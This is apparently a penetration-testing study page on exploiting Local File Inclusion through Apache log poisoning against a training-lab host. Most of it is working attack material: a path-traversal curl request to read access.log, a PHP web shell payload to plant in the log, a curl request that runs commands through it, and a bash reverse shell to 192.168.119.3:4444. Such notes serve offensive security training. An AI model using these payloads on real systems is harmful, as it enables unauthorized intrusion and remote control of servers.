File Inclusion Vulnerability

An attacker can exploit a Local File Inclusion (LFI) vulnerability to both access and display the contents of files on the target system. In some cases, LFI may also lead to the execution of files or code, depending on the system's configuration and the presence of additional vulnerabilities.

A common way is to do log poisoning and execute the exploitable files.

Log poisoning

A resource to look at:

# Confirm that you can access the log file.
curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log

# Look at the details that is being captured in log file.
# Replace below file with command if it is php file
<?php echo system($_GET['cmd']); ?>

# You can run command in below way:
# you can use burp suite as it easy and handy, I am showing with curl command.
curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log&cmd=ps

# You can get reverse shell using below command:
bash -c "bash -i >& /dev/tcp/192.168.119.3/4444 0>&1"
# URL Encode it before running.
# In burp suite select the reverse shell command and press CTRL + u to URL encode it.

Log poisoning in Windows systems involves manipulating the log file's contents. For PHP-based applications, the key difference lies in the log file location.

For example, on a target running XAMPP, the Apache logs can be found in C:\xampp\apache\logs.

For Windows:

Then got the shell using POWERSHELL BASE64 code

PreviousFetching SSH Private Key NextPHP Wrappers

Last updated 1 year ago

hashtagLog poisoning

Log poisoning